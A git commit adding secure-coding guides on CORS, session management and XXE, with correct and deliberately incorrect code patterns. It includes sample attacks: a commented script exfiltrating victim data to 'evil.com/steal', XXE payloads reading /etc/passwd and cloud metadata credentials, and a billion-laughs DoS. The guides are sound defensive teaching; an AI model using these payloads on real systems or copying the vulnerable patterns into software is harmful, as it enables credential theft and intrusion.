Add session management, CORS, XXE patterns
Complete the security patterns collection: - session-management.md: fixation, hijacking, secure cookies, concurrent sessions - cors.md: origin validation, reflected origin attacks, preflight caching - xxe.md: external entities, DTD attacks, language-specific fixes Now 19 patterns covering comprehensive web application security.
This commit is contained in:
@@ -20,13 +20,14 @@ Based on OWASP Top 10:2025 and recent security research.
|
|||||||
| [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
|
| [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
|
||||||
| [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |
|
| [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |
|
||||||
|
|
||||||
### Identity
|
### Identity & Session
|
||||||
|
|
||||||
| File | Topic | OWASP 2025 |
|
| File | Topic | OWASP 2025 |
|
||||||
|------|-------|------------|
|
|------|-------|------------|
|
||||||
| [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
|
| [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
|
||||||
| [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
|
| [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
|
||||||
| [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
|
| [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
|
||||||
|
| [session-management.md](session-management.md) | Session fixation, hijacking, secure cookies | A07 |
|
||||||
|
|
||||||
### Attack Prevention
|
### Attack Prevention
|
||||||
|
|
||||||
@@ -34,10 +35,12 @@ Based on OWASP Top 10:2025 and recent security research.
|
|||||||
|------|-------|------------|
|
|------|-------|------------|
|
||||||
| [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
|
| [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
|
||||||
| [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
|
| [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
|
||||||
|
| [xxe.md](xxe.md) | XML external entities, DTD attacks | A05 |
|
||||||
| [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | — |
|
| [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | — |
|
||||||
| [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | — |
|
| [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | — |
|
||||||
| [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
|
| [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
|
||||||
| [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | — |
|
| [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | — |
|
||||||
|
| [cors.md](cors.md) | Origin validation, credential handling | A01 |
|
||||||
|
|
||||||
### Infrastructure
|
### Infrastructure
|
||||||
|
|
||||||
@@ -50,13 +53,13 @@ Based on OWASP Top 10:2025 and recent security research.
|
|||||||
|
|
||||||
| # | Category | Pattern |
|
| # | Category | Pattern |
|
||||||
|---|----------|---------|
|
|---|----------|---------|
|
||||||
| A01 | Broken Access Control | authorization.md |
|
| A01 | Broken Access Control | authorization.md, cors.md |
|
||||||
| A02 | Security Misconfiguration | secure-defaults.md |
|
| A02 | Security Misconfiguration | secure-defaults.md |
|
||||||
| A03 | Software Supply Chain Failures | supply-chain.md |
|
| A03 | Software Supply Chain Failures | supply-chain.md |
|
||||||
| A04 | Cryptographic Failures | cryptography.md |
|
| A04 | Cryptographic Failures | cryptography.md |
|
||||||
| A05 | Injection | injection-prevention.md |
|
| A05 | Injection | injection-prevention.md, xxe.md |
|
||||||
| A06 | Insecure Design | secure-defaults.md |
|
| A06 | Insecure Design | secure-defaults.md |
|
||||||
| A07 | Authentication Failures | authentication.md, jwt-security.md |
|
| A07 | Authentication Failures | authentication.md, jwt-security.md, session-management.md |
|
||||||
| A08 | Software or Data Integrity Failures | deserialization.md |
|
| A08 | Software or Data Integrity Failures | deserialization.md |
|
||||||
| A09 | Security Logging and Alerting Failures | audit-logging.md |
|
| A09 | Security Logging and Alerting Failures | audit-logging.md |
|
||||||
| A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |
|
| A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |
|
||||||
|
|||||||
@@ -0,0 +1,183 @@
|
|||||||
|
# CORS Misconfiguration
|
||||||
|
|
||||||
|
## Rule
|
||||||
|
|
||||||
|
Never reflect Origin blindly. Allowlist specific origins. Don't use credentials with wildcards.
|
||||||
|
|
||||||
|
**Source:** [OWASP CORS Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
|
||||||
|
|
||||||
|
## CORS Basics
|
||||||
|
|
||||||
|
Browser blocks cross-origin requests by default. CORS headers selectively allow them:
|
||||||
|
|
||||||
|
| Header | Purpose |
|
||||||
|
|--------|---------|
|
||||||
|
| `Access-Control-Allow-Origin` | Which origins can access |
|
||||||
|
| `Access-Control-Allow-Credentials` | Allow cookies/auth |
|
||||||
|
| `Access-Control-Allow-Methods` | Allowed HTTP methods |
|
||||||
|
| `Access-Control-Allow-Headers` | Allowed request headers |
|
||||||
|
|
||||||
|
## Correct Pattern
|
||||||
|
|
||||||
|
```python
|
||||||
|
from flask import Flask, request
|
||||||
|
|
||||||
|
ALLOWED_ORIGINS = {
|
||||||
|
"https://app.example.com",
|
||||||
|
"https://admin.example.com",
|
||||||
|
}
|
||||||
|
|
||||||
|
def add_cors_headers(response):
|
||||||
|
origin = request.headers.get("Origin")
|
||||||
|
|
||||||
|
# Validate against allowlist
|
||||||
|
if origin in ALLOWED_ORIGINS:
|
||||||
|
response.headers["Access-Control-Allow-Origin"] = origin
|
||||||
|
response.headers["Access-Control-Allow-Credentials"] = "true"
|
||||||
|
response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
|
||||||
|
response.headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization"
|
||||||
|
response.headers["Vary"] = "Origin" # Important for caching!
|
||||||
|
|
||||||
|
return response
|
||||||
|
|
||||||
|
# For public APIs without credentials
|
||||||
|
def add_public_cors(response):
|
||||||
|
response.headers["Access-Control-Allow-Origin"] = "*"
|
||||||
|
# Note: credentials CANNOT be used with wildcard
|
||||||
|
response.headers["Access-Control-Allow-Methods"] = "GET"
|
||||||
|
return response
|
||||||
|
|
||||||
|
# Handle preflight requests
|
||||||
|
@app.route("/api/<path:path>", methods=["OPTIONS"])
|
||||||
|
def preflight(path):
|
||||||
|
response = make_response()
|
||||||
|
return add_cors_headers(response)
|
||||||
|
```
|
||||||
|
|
||||||
|
## Incorrect Pattern
|
||||||
|
|
||||||
|
```python
|
||||||
|
# Wrong: reflect any origin (allows any site to access)
|
||||||
|
@app.after_request
|
||||||
|
def bad_cors(response):
|
||||||
|
origin = request.headers.get("Origin")
|
||||||
|
response.headers["Access-Control-Allow-Origin"] = origin # Reflected!
|
||||||
|
response.headers["Access-Control-Allow-Credentials"] = "true"
|
||||||
|
return response
|
||||||
|
# Attack: evil.com can now make authenticated requests
|
||||||
|
|
||||||
|
# Wrong: wildcard with credentials
|
||||||
|
response.headers["Access-Control-Allow-Origin"] = "*"
|
||||||
|
response.headers["Access-Control-Allow-Credentials"] = "true"
|
||||||
|
# Browser will reject, but shows misunderstanding
|
||||||
|
|
||||||
|
# Wrong: regex bypass
|
||||||
|
def check_origin(origin):
|
||||||
|
return origin.endswith(".example.com")
|
||||||
|
# Bypassed by: attacker-example.com
|
||||||
|
|
||||||
|
# Wrong: null origin allowed
|
||||||
|
ALLOWED_ORIGINS = {"https://app.example.com", "null"}
|
||||||
|
# "null" origin sent by sandboxed iframes, file:// URLs - attacker controlled!
|
||||||
|
|
||||||
|
# Wrong: substring match
|
||||||
|
def check_origin(origin):
|
||||||
|
return "example.com" in origin
|
||||||
|
# Bypassed by: example.com.evil.com
|
||||||
|
```
|
||||||
|
|
||||||
|
## Origin Validation
|
||||||
|
|
||||||
|
```python
|
||||||
|
from urllib.parse import urlparse
|
||||||
|
|
||||||
|
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}
|
||||||
|
|
||||||
|
def is_valid_origin(origin: str) -> bool:
|
||||||
|
"""Strict origin validation."""
|
||||||
|
if not origin:
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Never allow null
|
||||||
|
if origin == "null":
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Exact match against allowlist
|
||||||
|
if origin in ALLOWED_ORIGINS:
|
||||||
|
return True
|
||||||
|
|
||||||
|
# If you need subdomain matching, be careful:
|
||||||
|
try:
|
||||||
|
parsed = urlparse(origin)
|
||||||
|
# Must be HTTPS
|
||||||
|
if parsed.scheme != "https":
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Exact domain match (not suffix!)
|
||||||
|
allowed_domains = {"app.example.com", "admin.example.com"}
|
||||||
|
if parsed.netloc in allowed_domains:
|
||||||
|
return True
|
||||||
|
|
||||||
|
# Subdomain of specific parent (careful!)
|
||||||
|
if parsed.netloc.endswith(".trusted.example.com"):
|
||||||
|
# Verify it's actually a subdomain, not suffix attack
|
||||||
|
parts = parsed.netloc.split(".")
|
||||||
|
if len(parts) >= 4 and parts[-3:] == ["trusted", "example", "com"]:
|
||||||
|
return True
|
||||||
|
except Exception:
|
||||||
|
return False
|
||||||
|
|
||||||
|
return False
|
||||||
|
```
|
||||||
|
|
||||||
|
## Attack Scenarios
|
||||||
|
|
||||||
|
```python
|
||||||
|
# Scenario 1: Data theft via reflected origin
|
||||||
|
#
|
||||||
|
# Vulnerable server reflects any Origin with credentials
|
||||||
|
#
|
||||||
|
# Attacker's evil.com:
|
||||||
|
# <script>
|
||||||
|
# fetch("https://api.victim.com/user/profile", {
|
||||||
|
# credentials: "include"
|
||||||
|
# })
|
||||||
|
# .then(r => r.json())
|
||||||
|
# .then(data => {
|
||||||
|
# // Send stolen data to attacker
|
||||||
|
# fetch("https://evil.com/steal?data=" + JSON.stringify(data))
|
||||||
|
# })
|
||||||
|
# </script>
|
||||||
|
|
||||||
|
# Scenario 2: CSRF via CORS
|
||||||
|
#
|
||||||
|
# If CORS allows credentials from evil.com,
|
||||||
|
# evil.com can make authenticated state-changing requests
|
||||||
|
```
|
||||||
|
|
||||||
|
## Preflight Caching
|
||||||
|
|
||||||
|
```python
|
||||||
|
@app.after_request
|
||||||
|
def cors_headers(response):
|
||||||
|
origin = request.headers.get("Origin")
|
||||||
|
if origin in ALLOWED_ORIGINS:
|
||||||
|
response.headers["Access-Control-Allow-Origin"] = origin
|
||||||
|
response.headers["Access-Control-Allow-Credentials"] = "true"
|
||||||
|
response.headers["Access-Control-Max-Age"] = "86400" # Cache preflight 24h
|
||||||
|
response.headers["Vary"] = "Origin" # CRITICAL for caching
|
||||||
|
return response
|
||||||
|
|
||||||
|
# Why Vary: Origin matters:
|
||||||
|
# Without it, CDN might cache response for origin A
|
||||||
|
# Then serve that cached response to origin B (wrong ACAO header!)
|
||||||
|
```
|
||||||
|
|
||||||
|
## Edge Cases
|
||||||
|
|
||||||
|
- WebSocket connections don't use CORS (use Origin header manually)
|
||||||
|
- `Access-Control-Expose-Headers` needed for custom response headers
|
||||||
|
- Preflight not sent for "simple" requests (GET, POST with basic headers)
|
||||||
|
- Internal APIs should still validate Origin (defense in depth)
|
||||||
|
- Browser extensions can bypass CORS (not a vulnerability)
|
||||||
|
- Server-to-server requests don't involve CORS
|
||||||
@@ -0,0 +1,185 @@
|
|||||||
|
# Session Management
|
||||||
|
|
||||||
|
## Rule
|
||||||
|
|
||||||
|
Generate unpredictable session IDs. Bind sessions to users. Expire aggressively. Regenerate on privilege change.
|
||||||
|
|
||||||
|
**Source:** [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)
|
||||||
|
|
||||||
|
## Session Attacks
|
||||||
|
|
||||||
|
| Attack | Description | Defense |
|
||||||
|
|--------|-------------|---------|
|
||||||
|
| Session fixation | Attacker sets victim's session ID | Regenerate on login |
|
||||||
|
| Session hijacking | Steal session via XSS/network | httpOnly, Secure flags |
|
||||||
|
| Session prediction | Guess valid session IDs | Cryptographic randomness |
|
||||||
|
| Session replay | Reuse captured session | Short expiration, binding |
|
||||||
|
|
||||||
|
## Correct Pattern
|
||||||
|
|
||||||
|
```python
|
||||||
|
import secrets
|
||||||
|
from datetime import datetime, timedelta
|
||||||
|
from flask import session, request
|
||||||
|
|
||||||
|
# Generate cryptographically secure session ID
|
||||||
|
def generate_session_id() -> str:
|
||||||
|
return secrets.token_urlsafe(32) # 256 bits of entropy
|
||||||
|
|
||||||
|
# Session configuration
|
||||||
|
SESSION_CONFIG = {
|
||||||
|
"cookie_name": "__Host-session", # __Host- prefix enforces Secure + no Domain
|
||||||
|
"httponly": True, # Not accessible to JavaScript
|
||||||
|
"secure": True, # HTTPS only
|
||||||
|
"samesite": "Lax", # CSRF protection
|
||||||
|
"max_age": 3600, # 1 hour max
|
||||||
|
}
|
||||||
|
|
||||||
|
# Regenerate session on privilege change
|
||||||
|
def login(user: User, password: str) -> bool:
|
||||||
|
if not verify_password(user, password):
|
||||||
|
return False
|
||||||
|
|
||||||
|
# CRITICAL: regenerate session ID to prevent fixation
|
||||||
|
session.regenerate()
|
||||||
|
|
||||||
|
session["user_id"] = user.id
|
||||||
|
session["login_time"] = datetime.utcnow().isoformat()
|
||||||
|
session["ip"] = request.remote_addr
|
||||||
|
session["user_agent"] = request.user_agent.string
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
|
def logout():
|
||||||
|
# Invalidate server-side, not just client cookie
|
||||||
|
session_id = session.get("_id")
|
||||||
|
if session_id:
|
||||||
|
invalidate_session_server_side(session_id)
|
||||||
|
session.clear()
|
||||||
|
|
||||||
|
# Validate session binding
|
||||||
|
def validate_session() -> bool:
|
||||||
|
if "user_id" not in session:
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Check session age
|
||||||
|
login_time = datetime.fromisoformat(session.get("login_time", ""))
|
||||||
|
if datetime.utcnow() - login_time > timedelta(hours=8):
|
||||||
|
logout()
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Optional: bind to IP (careful with mobile/proxies)
|
||||||
|
# if session.get("ip") != request.remote_addr:
|
||||||
|
# logout()
|
||||||
|
# return False
|
||||||
|
|
||||||
|
return True
|
||||||
|
```
|
||||||
|
|
||||||
|
## Incorrect Pattern
|
||||||
|
|
||||||
|
```python
|
||||||
|
import random
|
||||||
|
import hashlib
|
||||||
|
|
||||||
|
# Wrong: predictable session ID
|
||||||
|
def bad_session_id():
|
||||||
|
return str(random.randint(1000000, 9999999))
|
||||||
|
|
||||||
|
# Wrong: sequential session ID
|
||||||
|
COUNTER = 0
|
||||||
|
def bad_session_id_2():
|
||||||
|
global COUNTER
|
||||||
|
COUNTER += 1
|
||||||
|
return str(COUNTER)
|
||||||
|
|
||||||
|
# Wrong: user-derived session ID
|
||||||
|
def bad_session_id_3(user_id):
|
||||||
|
return hashlib.md5(str(user_id).encode()).hexdigest()
|
||||||
|
|
||||||
|
# Wrong: no regeneration on login (session fixation)
|
||||||
|
def bad_login(user, password):
|
||||||
|
if verify_password(user, password):
|
||||||
|
session["user_id"] = user.id # Same session ID!
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Wrong: client-side only logout
|
||||||
|
def bad_logout():
|
||||||
|
return redirect("/", headers={"Set-Cookie": "session=; Max-Age=0"})
|
||||||
|
# Session still valid server-side!
|
||||||
|
|
||||||
|
# Wrong: missing cookie security flags
|
||||||
|
app.config["SESSION_COOKIE_HTTPONLY"] = False # XSS can steal
|
||||||
|
app.config["SESSION_COOKIE_SECURE"] = False # Sent over HTTP
|
||||||
|
```
|
||||||
|
|
||||||
|
## Session Fixation Attack
|
||||||
|
|
||||||
|
```python
|
||||||
|
# Attack scenario:
|
||||||
|
# 1. Attacker visits site, gets session ID "abc123"
|
||||||
|
# 2. Attacker sends victim link: https://site.com/?sessionid=abc123
|
||||||
|
# 3. Victim clicks, their browser now uses "abc123"
|
||||||
|
# 4. Victim logs in (session ID unchanged!)
|
||||||
|
# 5. Attacker uses "abc123" - now authenticated as victim
|
||||||
|
|
||||||
|
# Defense: ALWAYS regenerate on login
|
||||||
|
@app.route("/login", methods=["POST"])
|
||||||
|
def login():
|
||||||
|
if authenticate(request.form):
|
||||||
|
session.regenerate() # New session ID
|
||||||
|
session["authenticated"] = True
|
||||||
|
return redirect("/")
|
||||||
|
```
|
||||||
|
|
||||||
|
## Concurrent Session Control
|
||||||
|
|
||||||
|
```python
|
||||||
|
# Limit active sessions per user
|
||||||
|
MAX_SESSIONS_PER_USER = 3
|
||||||
|
|
||||||
|
def create_session(user_id: str) -> str:
|
||||||
|
# Get existing sessions
|
||||||
|
existing = Session.query.filter_by(user_id=user_id).order_by(
|
||||||
|
Session.created_at.asc()
|
||||||
|
).all()
|
||||||
|
|
||||||
|
# Remove oldest if at limit
|
||||||
|
if len(existing) >= MAX_SESSIONS_PER_USER:
|
||||||
|
oldest = existing[0]
|
||||||
|
oldest.delete()
|
||||||
|
# Optionally notify user: "Logged out of oldest session"
|
||||||
|
|
||||||
|
# Create new session
|
||||||
|
session_id = generate_session_id()
|
||||||
|
Session.create(
|
||||||
|
id=session_id,
|
||||||
|
user_id=user_id,
|
||||||
|
created_at=datetime.utcnow(),
|
||||||
|
ip=request.remote_addr
|
||||||
|
)
|
||||||
|
return session_id
|
||||||
|
|
||||||
|
# Allow user to view/revoke sessions
|
||||||
|
@app.route("/settings/sessions")
|
||||||
|
def list_sessions():
|
||||||
|
sessions = Session.query.filter_by(user_id=current_user.id).all()
|
||||||
|
return render_template("sessions.html", sessions=sessions)
|
||||||
|
|
||||||
|
@app.route("/settings/sessions/<session_id>/revoke", methods=["POST"])
|
||||||
|
def revoke_session(session_id):
|
||||||
|
session = Session.query.get(session_id)
|
||||||
|
if session and session.user_id == current_user.id:
|
||||||
|
session.delete()
|
||||||
|
return redirect("/settings/sessions")
|
||||||
|
```
|
||||||
|
|
||||||
|
## Edge Cases
|
||||||
|
|
||||||
|
- Mobile apps: use short-lived access tokens, not sessions
|
||||||
|
- "Remember me": separate long-lived token, not extended session
|
||||||
|
- Password change should invalidate all other sessions
|
||||||
|
- Admin impersonation needs audit trail
|
||||||
|
- Idle timeout vs absolute timeout (both needed)
|
||||||
|
- Session data size limits (don't store large objects)
|
||||||
@@ -0,0 +1,181 @@
|
|||||||
|
# XML External Entities (XXE)
|
||||||
|
|
||||||
|
## Rule
|
||||||
|
|
||||||
|
Disable external entity processing. Disable DTDs. Use safe parser defaults.
|
||||||
|
|
||||||
|
**Source:** [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
|
||||||
|
|
||||||
|
## What XXE Can Do
|
||||||
|
|
||||||
|
- **File disclosure**: Read `/etc/passwd`, config files, source code
|
||||||
|
- **SSRF**: Make requests to internal services
|
||||||
|
- **DoS**: Billion laughs attack (exponential entity expansion)
|
||||||
|
- **Port scanning**: Error-based probing of internal ports
|
||||||
|
- **RCE**: In some configurations (PHP expect://)
|
||||||
|
|
||||||
|
## Attack Payloads
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<!-- File disclosure -->
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo [
|
||||||
|
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
||||||
|
]>
|
||||||
|
<data>&xxe;</data>
|
||||||
|
|
||||||
|
<!-- SSRF to cloud metadata -->
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo [
|
||||||
|
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
|
||||||
|
]>
|
||||||
|
<data>&xxe;</data>
|
||||||
|
|
||||||
|
<!-- Billion laughs DoS -->
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE lolz [
|
||||||
|
<!ENTITY lol "lol">
|
||||||
|
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
|
||||||
|
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
|
||||||
|
<!-- ... continues exponentially -->
|
||||||
|
]>
|
||||||
|
<lolz>&lol9;</lolz>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Correct Pattern
|
||||||
|
|
||||||
|
```python
|
||||||
|
# Python - defusedxml (recommended)
|
||||||
|
import defusedxml.ElementTree as ET
|
||||||
|
|
||||||
|
def parse_xml_safe(xml_string: str):
|
||||||
|
"""Parse XML with XXE protection."""
|
||||||
|
return ET.fromstring(xml_string)
|
||||||
|
|
||||||
|
# Python - standard library with safe settings
|
||||||
|
from xml.etree.ElementTree import XMLParser, parse
|
||||||
|
import xml.etree.ElementTree as ET
|
||||||
|
|
||||||
|
def parse_xml_manual(xml_string: str):
|
||||||
|
"""Manual safe configuration."""
|
||||||
|
parser = ET.XMLParser()
|
||||||
|
# Python's ElementTree doesn't resolve external entities by default
|
||||||
|
# But always verify your specific library!
|
||||||
|
return ET.fromstring(xml_string, parser=parser)
|
||||||
|
|
||||||
|
# lxml with safe settings
|
||||||
|
from lxml import etree
|
||||||
|
|
||||||
|
def parse_xml_lxml(xml_string: str):
|
||||||
|
"""lxml with XXE disabled."""
|
||||||
|
parser = etree.XMLParser(
|
||||||
|
resolve_entities=False,
|
||||||
|
no_network=True,
|
||||||
|
dtd_validation=False,
|
||||||
|
load_dtd=False,
|
||||||
|
)
|
||||||
|
return etree.fromstring(xml_string.encode(), parser=parser)
|
||||||
|
```
|
||||||
|
|
||||||
|
## Incorrect Pattern
|
||||||
|
|
||||||
|
```python
|
||||||
|
from lxml import etree
|
||||||
|
|
||||||
|
# Wrong: default lxml settings allow XXE
|
||||||
|
def bad_parse(xml_string: str):
|
||||||
|
return etree.fromstring(xml_string)
|
||||||
|
|
||||||
|
# Wrong: explicitly enabling dangerous features
|
||||||
|
def bad_parse_2(xml_string: str):
|
||||||
|
parser = etree.XMLParser(resolve_entities=True)
|
||||||
|
return etree.fromstring(xml_string, parser=parser)
|
||||||
|
|
||||||
|
# Wrong: using xml.dom.minidom without protection
|
||||||
|
from xml.dom.minidom import parseString
|
||||||
|
def bad_parse_3(xml_string: str):
|
||||||
|
return parseString(xml_string) # May be vulnerable
|
||||||
|
|
||||||
|
# Wrong: SAX parser without disabling features
|
||||||
|
import xml.sax
|
||||||
|
def bad_parse_4(xml_string: str):
|
||||||
|
handler = MyHandler()
|
||||||
|
xml.sax.parseString(xml_string, handler)
|
||||||
|
```
|
||||||
|
|
||||||
|
## Language-Specific Fixes
|
||||||
|
|
||||||
|
### Java
|
||||||
|
|
||||||
|
```java
|
||||||
|
// DocumentBuilderFactory
|
||||||
|
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
|
||||||
|
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
|
||||||
|
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
|
||||||
|
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
|
||||||
|
dbf.setXIncludeAware(false);
|
||||||
|
dbf.setExpandEntityReferences(false);
|
||||||
|
|
||||||
|
// SAXParserFactory
|
||||||
|
SAXParserFactory spf = SAXParserFactory.newInstance();
|
||||||
|
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
|
||||||
|
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
|
||||||
|
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
|
||||||
|
```
|
||||||
|
|
||||||
|
### .NET
|
||||||
|
|
||||||
|
```csharp
|
||||||
|
// XmlReader (safe by default in .NET 4.5.2+)
|
||||||
|
XmlReaderSettings settings = new XmlReaderSettings();
|
||||||
|
settings.DtdProcessing = DtdProcessing.Prohibit;
|
||||||
|
settings.XmlResolver = null;
|
||||||
|
XmlReader reader = XmlReader.Create(stream, settings);
|
||||||
|
|
||||||
|
// XmlDocument
|
||||||
|
XmlDocument doc = new XmlDocument();
|
||||||
|
doc.XmlResolver = null; // Disable external resources
|
||||||
|
doc.LoadXml(xmlString);
|
||||||
|
```
|
||||||
|
|
||||||
|
### PHP
|
||||||
|
|
||||||
|
```php
|
||||||
|
// Disable entity loading globally
|
||||||
|
libxml_disable_entity_loader(true);
|
||||||
|
|
||||||
|
// Use LIBXML options
|
||||||
|
$doc = new DOMDocument();
|
||||||
|
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);
|
||||||
|
// Actually, better to just not use those flags:
|
||||||
|
$doc->loadXML($xml, LIBXML_NONET);
|
||||||
|
```
|
||||||
|
|
||||||
|
## When You Need DTDs
|
||||||
|
|
||||||
|
```python
|
||||||
|
# If you absolutely need DTD validation (rare):
|
||||||
|
# 1. Allowlist specific DTDs
|
||||||
|
# 2. Fetch DTDs from local filesystem only
|
||||||
|
# 3. Never allow user-controlled DTD URLs
|
||||||
|
|
||||||
|
ALLOWED_DTDS = {
|
||||||
|
"-//W3C//DTD XHTML 1.0 Strict//EN": "/path/to/local/xhtml1-strict.dtd"
|
||||||
|
}
|
||||||
|
|
||||||
|
class SafeResolver(etree.Resolver):
|
||||||
|
def resolve(self, system_url, public_id, context):
|
||||||
|
if public_id in ALLOWED_DTDS:
|
||||||
|
return self.resolve_filename(ALLOWED_DTDS[public_id], context)
|
||||||
|
raise ValueError(f"DTD not allowed: {public_id}")
|
||||||
|
```
|
||||||
|
|
||||||
|
## Edge Cases
|
||||||
|
|
||||||
|
- SVG files are XML — validate uploads!
|
||||||
|
- SOAP/XML-RPC endpoints are XXE targets
|
||||||
|
- Office documents (DOCX, XLSX) contain XML
|
||||||
|
- Configuration files (Maven pom.xml, Spring beans.xml)
|
||||||
|
- RSS/Atom feeds
|
||||||
|
- SAML assertions
|
||||||
|
- Blind XXE (out-of-band data exfiltration via DNS/HTTP)
|
||||||
Reference in New Issue
Block a user